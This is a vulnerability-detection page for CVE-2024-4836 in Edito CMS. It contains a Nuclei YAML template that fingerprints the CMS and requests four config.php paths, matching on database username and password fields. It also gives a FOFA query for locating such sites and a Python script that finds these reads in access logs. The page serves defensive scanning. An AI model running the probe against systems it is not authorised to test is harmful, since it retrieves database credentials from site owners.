Edito CMS - Sensitive Data Leak
ID: CVE-2024-4836
Severity: high
Author: s4e-io
Tags: cve,cve2024,cms,edito,info-leak
Description
Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user.
YAML Source
id: CVE-2024-4836

info:
  name: Edito CMS - Sensitive Data Leak
  author: s4e-io
  severity: high
  description: |
    Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user.
  reference:
    - https://cert.pl/en/posts/2024/07/CVE-2024-4836/
    - https://github.com/sleep46/CVE-2024-4836_Check
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4836
  metadata:
    max-request: 5
    fofa-query: icon_hash="1491301339"
  tags: cve,cve2024,cms,edito,info-leak

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body,"content=\"edito", "www.edito.pl")'
          - "status_code==200"
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/config.php"
      - "{{BaseURL}}/config/config.php"
      - "{{BaseURL}}/include/config.php"
      - "{{BaseURL}}/includes/config.php"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"db_password", "db_username")'
          - "status_code==200"
        condition: and
# digest: 4b0a00483046022100e7c277c65e43e1ee8f1e0cc24b3a06f7e83af54e3b77900f7ba7ce52d2158536022100e8f4cd406dd6690bf5bac42f59e3e478e87e3c4c73fbaf4f6ab6c185ad0fa003:922c64590222798bb761d5b6d8e72950
Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-4836.yaml"
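A defender-side complement to the template, as an added example that is not part of the original page or the template author's code: it scans web-server access logs for successful reads of the four config paths the template requests. The Combined Log Format, the constructed sample lines and the function names are assumptions.

```python
import re

# Paths requested by the template's second HTTP step (taken from the YAML above).
CONFIG_PATHS = {
    "/config.php",
    "/config/config.php",
    "/include/config.php",
    "/includes/config.php",
}

# Assumed Combined Log Format: ip ident user [time] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def normalize(target):
    """Drop query string/fragment, collapse duplicate slashes, lowercase."""
    path = re.split(r"[?#]", target, maxsplit=1)[0]
    return re.sub(r"/{2,}", "/", path).lower()

def find_config_reads(lines):
    """Return (ip, time, path, size) for each 200 response with a body to a config path."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["status"] != "200":
            continue
        path = normalize(m["target"])
        size = 0 if m["size"] == "-" else int(m["size"])
        # Assumption: a config file that is executed rather than served as text
        # returns an empty body, so only non-empty 200 responses are reported.
        if path in CONFIG_PATHS and size > 0:
            hits.append((m["ip"], m["time"], path, size))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jul/2024:09:14:02 +0000] "GET / HTTP/1.1" 200 18452 "-" "curl/8.5.0"',
    '203.0.113.7 - - [10/Jul/2024:09:14:03 +0000] "GET /config.php HTTP/1.1" 404 196 "-" "curl/8.5.0"',
    '203.0.113.7 - - [10/Jul/2024:09:14:03 +0000] "GET /config/config.php HTTP/1.1" 200 742 "-" "curl/8.5.0"',
    '198.51.100.23 - - [10/Jul/2024:11:30:41 +0000] "GET /includes/config.php?x=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Jul/2024:11:30:42 +0000] "GET //include//config.php HTTP/1.1" 200 611 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, when, path, size in find_config_reads(SAMPLE_LOG):
        print(f"{when} {ip} read {path} ({size} bytes)")
```

Any hit means a config file body was returned to the client, so the database credentials it contains should be treated as exposed and rotated.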